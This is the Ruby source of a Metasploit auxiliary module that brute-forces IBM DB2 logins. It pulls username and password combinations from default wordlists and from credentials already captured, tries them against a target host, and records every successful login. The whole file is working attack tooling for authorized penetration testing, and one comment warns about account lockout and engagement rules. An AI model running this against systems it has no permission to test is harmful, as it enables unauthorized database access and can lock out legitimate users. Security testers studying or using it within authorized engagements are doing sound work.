##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'metasploit/framework/credential_collection'
require 'metasploit/framework/login_scanner/db2'

# Credential brute-force scanner for IBM DB2.
#
# Builds a credential set from the USER_FILE / PASS_FILE / USERPASS_FILE
# options (plus whatever prepend_db_passwords adds from the workspace),
# hands it to the framework's DB2 login scanner and records every
# outcome in the credential store.
#
# NOTE(review): DB2 commonly delegates authentication to the host OS, so
# a long wordlist may trip the target's account-lockout policy — confirm
# the engagement rules before running this against production systems.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::DB2
  include Msf::Auxiliary::AuthBrute
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report

  # Module metadata plus the three wordlist options. The defaults point at
  # the framework's bundled DB2 default-credential lists under data/wordlists.
  def initialize
    super(
      'Name'        => 'DB2 Authentication Brute Force Utility',
      'Description' => %q{This module attempts to authenticate against a DB2 instance using username and password combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options.},
      'Author'      => ['todb'],
      'References'  => [
        [ 'CVE', '1999-0502'] # Weak password
      ],
      'License'     => MSF_LICENSE
    )

    wordlist_dir = File.join(Msf::Config.data_directory, "wordlists")
    register_options(
      [
        Opt::Proxies,
        OptPath.new('USERPASS_FILE', [ false, "File containing (space-seperated) users and passwords, one pair per line", File.join(wordlist_dir, "db2_default_userpass.txt") ]),
        OptPath.new('USER_FILE', [ false, "File containing users, one per line", File.join(wordlist_dir, "db2_default_user.txt") ]),
        OptPath.new('PASS_FILE', [ false, "File containing passwords, one per line", File.join(wordlist_dir, "db2_default_pass.txt") ]),
      ], self.class)
  end

  # Scanner mixin entry point: runs the whole credential set against one
  # host and reports each attempt as it completes.
  #
  # @param ip [String] target address handed in by the Scanner mixin
  def run_host(ip)
    login_scanner = build_login_scanner(ip, build_credentials)

    login_scanner.scan! do |result|
      record_result(ip, result)
    end
  end

  private

  # Assemble the credential set from the datastore. BLANK_PASSWORDS,
  # USERNAME/PASSWORD and USER_AS_PASS are presumably registered by the
  # AuthBrute mixin (not visible here); DATABASE is used as the realm.
  # prepend_db_passwords then puts previously captured credentials first.
  def build_credentials
    collection = Metasploit::Framework::CredentialCollection.new(
      blank_passwords: datastore['BLANK_PASSWORDS'],
      pass_file:       datastore['PASS_FILE'],
      password:        datastore['PASSWORD'],
      user_file:       datastore['USER_FILE'],
      userpass_file:   datastore['USERPASS_FILE'],
      username:        datastore['USERNAME'],
      user_as_pass:    datastore['USER_AS_PASS'],
      realm:           datastore['DATABASE']
    )
    prepend_db_passwords(collection)
  end

  # Configure the DB2 login scanner for a single host. Transport settings
  # (proxies, TCP send tuning, SSL, source host/port) all come from the
  # datastore; the connection timeout is fixed at 30 seconds and is not
  # exposed as an option.
  def build_login_scanner(ip, credentials)
    Metasploit::Framework::LoginScanner::DB2.new(
      host:               ip,
      port:               rport,
      proxies:            datastore['PROXIES'],
      cred_details:       credentials,
      stop_on_success:    datastore['STOP_ON_SUCCESS'],
      bruteforce_speed:   datastore['BRUTEFORCE_SPEED'],
      connection_timeout: 30,
      max_send_size:      datastore['TCP::max_send_size'],
      send_delay:         datastore['TCP::send_delay'],
      framework:          framework,
      framework_module:   self,
      ssl:                datastore['SSL'],
      ssl_version:        datastore['SSLVersion'],
      ssl_verify_mode:    datastore['SSLVerifyMode'],
      ssl_cipher:         datastore['SSLCipher'],
      local_port:         datastore['CPORT'],
      local_host:         datastore['CHOST']
    )
  end

  # Persist one scan result. A successful login is stored as a credential
  # core plus a login record and announced; a failure is passed to
  # invalidate_login and only printed in verbose mode.
  def record_result(ip, result)
    credential_data = result.to_h.merge!(
      module_fullname: self.fullname,
      workspace_id:    myworkspace_id
    )

    unless result.success?
      invalidate_login(credential_data)
      vprint_error "#{ip}:#{rport} - LOGIN FAILED: #{result.credential} (#{result.status}: #{result.proof})"
      return
    end

    credential_data[:core] = create_credential(credential_data)
    create_credential_login(credential_data)
    print_good "#{ip}:#{rport} - LOGIN SUCCESSFUL: #{result.credential}"
  end
end